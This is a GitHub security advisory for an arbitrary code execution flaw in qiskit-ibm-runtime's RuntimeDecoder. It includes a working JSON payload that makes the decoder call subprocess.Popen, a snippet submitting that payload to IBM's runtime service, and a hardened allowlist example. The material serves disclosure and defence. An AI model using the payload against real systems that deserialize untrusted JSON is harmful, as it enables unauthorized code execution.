GHSA-x4x5-jv3x-9c7m

Source
https://github.com/advisories/GHSA-x4x5-jv3x-9c7m
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-x4x5-jv3x-9c7m/GHSA-x4x5-jv3x-9c7m.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-x4x5-jv3x-9c7m
Aliases
Published
2024-03-20T15:44:22Z
Modified
2024-03-20T21:46:53.419489Z
Severity
  • 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Summary
`qiskit_ibm_runtime.RuntimeDecoder` can execute arbitrary code
Details

Summary

Deserializing JSON data with qiskit_ibm_runtime.RuntimeDecoder can be made to execute arbitrary code given a suitably formatted input string.

Details

RuntimeDecoder is supposed to deserialize JSON strings containing various special types encoded via RuntimeEncoder. However, the "settings" branch of its object hook imports the module named in `__module__`, looks up `__class__` on it, and calls it with `__value__` as keyword arguments, with no restriction on which module or class may be named. A malicious payload can therefore make the decoder spawn a subprocess and execute arbitrary code, exploiting this block of code: https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskit_ibm_runtime/utils/json.py#L156-L159

PoC

import json
import qiskit_ibm_runtime

# Payload shaped like a RuntimeEncoder "settings" object, but naming
# subprocess.Popen instead of a Qiskit type; "__value__" becomes Popen's kwargs
malicious_data = {
    "__type__": "settings",
    "__module__": "subprocess",
    "__class__": "Popen",
    "__value__": {
        "args": ["echo", "hi"]
    },
}
json_str = json.dumps(malicious_data)

_ = json.loads(json_str, cls=qiskit_ibm_runtime.RuntimeDecoder)  # prints "hi" to the terminal

(where obviously "echo hi" can be replaced with something much more malicious)
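As an added example (not code from the advisory or from qiskit-ibm-runtime), the dispatch pattern described above reduced to its essentials, beside a hardened variant that only resolves `__module__` under an allowlisted prefix. `VulnerableDecoder`, `HardenedDecoder`, `ALLOWED_MODULE_PREFIXES` and the two payloads are constructed for illustration; the allowlist is an assumption, not the project's actual fix in 0.21.2. The attacker payload reuses the advisory's subprocess.Popen gadget but points it at a no-op Python command so the spawned process has no visible effect.

```python
import importlib
import json
import sys

# Assumed allowlist for illustration only; the real library's fix is not
# reproduced here. Only modules equal to or under these prefixes may be imported.
ALLOWED_MODULE_PREFIXES = ("fractions",)


def _instantiate(obj):
    """Resolve __module__/__class__ and call it with __value__ as kwargs.

    Simplified reconstruction of the unguarded dispatch the advisory
    describes, not the library's own code.
    """
    mod = importlib.import_module(obj["__module__"])
    cls = getattr(mod, obj["__class__"])
    return cls(**obj["__value__"])


class VulnerableDecoder(json.JSONDecoder):
    """Instantiates any {"__type__": "settings"} object from any module.

    Mirrors the flaw (CWE-502); shown only to contrast with the hardened form.
    """

    def __init__(self, *args, **kwargs):
        kwargs["object_hook"] = self._hook
        super().__init__(*args, **kwargs)

    @staticmethod
    def _hook(obj):
        if obj.get("__type__") == "settings":
            return _instantiate(obj)
        return obj


class HardenedDecoder(json.JSONDecoder):
    """Same wire format, but __module__ must sit under an allowlisted prefix
    and __value__ must be a JSON object."""

    def __init__(self, *args, **kwargs):
        kwargs["object_hook"] = self._hook
        super().__init__(*args, **kwargs)

    @staticmethod
    def _hook(obj):
        if obj.get("__type__") != "settings":
            return obj
        module = obj.get("__module__")
        allowed = isinstance(module, str) and any(
            module == p or module.startswith(p + ".") for p in ALLOWED_MODULE_PREFIXES
        )
        if not allowed or not isinstance(obj.get("__value__"), dict):
            raise ValueError(f"refusing to instantiate {module!r} from untrusted JSON")
        return _instantiate(obj)


def attacker_payload():
    """Constructed payload: the advisory's Popen gadget, running a no-op command."""
    return json.dumps({
        "__type__": "settings",
        "__module__": "subprocess",
        "__class__": "Popen",
        "__value__": {"args": [sys.executable, "-c", "pass"]},
    })


def benign_payload():
    """Constructed payload naming an allowlisted stdlib type."""
    return json.dumps({
        "__type__": "settings",
        "__module__": "fractions",
        "__class__": "Fraction",
        "__value__": {"numerator": 3, "denominator": 4},
    })


def decode_vulnerable(json_str):
    return json.loads(json_str, cls=VulnerableDecoder)


def decode_hardened(json_str):
    """Return the decoded object, or the ValueError raised by the allowlist."""
    try:
        return json.loads(json_str, cls=HardenedDecoder)
    except ValueError as exc:
        return exc


if __name__ == "__main__":
    proc = decode_vulnerable(attacker_payload())
    print("vulnerable decoder spawned", type(proc).__name__, "exit code", proc.wait())
    print("hardened decoder, attacker payload:", decode_hardened(attacker_payload()))
    print("hardened decoder, benign payload:", decode_hardened(benign_payload()))
```

The check is a prefix match on the module path rather than a substring or regex, so `fractions` passes but `fractions_evil` and `subprocess` do not; rejecting non-dict `__value__` also blocks the `**` expansion from ever seeing attacker-shaped positional data.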

Notably, the following also makes it through the runtime API, with malicious_data serialized client-side via RuntimeEncoder (and therefore presumably deserialized server-side via RuntimeDecoder?):

from qiskit_ibm_runtime import QiskitRuntimeService

service = QiskitRuntimeService(<ibm_cloud_credentials>)  # credentials placeholder as in the report
job = service.run("qasm3-runner", malicious_data)       # malicious_data as defined in the PoC above
print(job.status())  # prints "JobStatus.QUEUED"

Impact

I don't know if qiskit_ibm_runtime.RuntimeDecoder is used server-side, so this may or may not be a serious vulnerability on your end (however, it's definitely a security hole for anyone using the library to deserialize third-party data).

Database specific
{
    "nvd_published_at": "2024-03-20T21:15:31Z",
    "cwe_ids": [
        "CWE-502"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-20T15:44:22Z"
}
References

Affected packages

PyPI / qiskit-ibm-runtime

Package

Name
qiskit-ibm-runtime
Purl
pkg:pypi/qiskit-ibm-runtime

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0.1.0
Fixed
0.21.2

Affected versions

0.*

0.1.0
0.1.1
0.2.0
0.3.0
0.4.0
0.5.0
0.6.0
0.6.1
0.6.2
0.7.0rc1
0.7.0rc2
0.7.0
0.8.0
0.9.0
0.9.1
0.9.2
0.9.3
0.9.4
0.10.0
0.11.0
0.11.1
0.11.2
0.11.3
0.12.0
0.12.1
0.12.2
0.13.0
0.14.0
0.15.0
0.15.1
0.16.0
0.16.1
0.17.0
0.18.0
0.19.0
0.19.1
0.20.0
0.21.0
0.21.1

Ecosystem specific

{
    "affected_functions": [
        "qiskit_ibm_runtime.RuntimeDecoder"
    ]
}